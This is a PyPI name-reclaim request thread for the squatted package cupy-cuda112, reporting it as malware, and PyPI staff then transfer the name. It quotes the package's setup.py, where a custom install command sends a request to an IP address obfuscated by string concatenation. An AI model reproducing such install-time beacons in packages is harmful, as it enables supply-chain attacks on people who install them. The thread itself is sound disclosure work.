PEP 541 Request: cupy-cuda112

[kmaehashi]

Project to be claimed

cupy-cuda112: https://pypi.org/project/cupy-cuda112

Your PyPI username

kmaehashi: https://pypi.org/user/kmaehashi

Reasons for the request

I believe this project can be considered as "Invalid projects" as specified in PEP 541. Specifically,

project is malware (designed to exploit or harm systems or users);

The project contains a setup.py file that sends a request to a malicious URL during installation.

class CustomInstallCommand(install):
    def run(self):
        install.run(self)
        url = "h"+"t"+"t"+"p"+":"+"/"+"/"+"1"+"0"+"1"+"."+"3"+"2"+"."+"9"+"9"+"."+"2"+"8"+"/name?cupy-cuda112"
        requests.get(url, timeout=30)

setup(
    name='cupy-cuda112',
    version='2.2.2',
    author='RemindSupplyChainRisks',
    author_email='RemindSupplyChainRisks@gmail.com',
    url='https://github.com/cupy-cuda112',
    description='Remind Supply Chain Risks',
    packages=['cupy-cuda112'],
    install_requires=['requests'],
    cmdclass={
        'install': CustomInstallCommand,
    },
)

project is name squatting (package has no functionality or is empty);

The package only contains __init__.py file, that says:

# the purpose is to make everyone pay attention to software supply chain attacks, because the risks are too great.

CuPy has been maintaining a package using cupy-cudaXXX naming scheme for years. Obviously the intention is to squat the (future) package name.

Maintenance or replacement?

I would like to use the package name cupy-cuda112.

https://github.com/cupy/cupy

Contact and additional research

No email addresses or any contact information available for https://pypi.org/user/RemindSupplyChainRisks/.

[kmaehashi]

No email addresses or any contact information available for https://pypi.org/user/RemindSupplyChainRisks/.

To clarify: I tried to contact the email address in setup.py (RemindSupplyChainRisks@gmail.com), but the email address is invalid.

Address not found
Your message wasn't delivered to RemindSupplyChainRisks@gmail.com because the address couldn't be found, or is unable to receive mail.
The response was: 550 5.1.1 The email account that you tried to reach does not exist. Please try double-checking the recipient's email address for typos or unnecessary spaces. Learn more at https://support.google.com/mail/?p=NoSuchUser e6sor777152vsh.44 - gsmtp

[ewdurbin]

project has been transferred and the release removed.

[kmaehashi]

Thank you very much for your quick response @ewdurbin!

[jakirkham]

Thank you, @ewdurbin! 😄

Would it be possible for @kmaehashi to reserve all cupy-cudaXYZ package names?

[di]

@jakirkham This is not currently technically possible, but we have a feature request for it here: pypi/warehouse#2589

[jakirkham]

Thanks for the info Dustin! 😄 Will track that issue 🙂

[kmaehashi]

@ewdurbin @di Just wanted to let you know that the same user is uploading 3591 packages today. All seem to have the same content.
https://pypi.org/user/RemindSupplyChainRisks

edit: see also: #935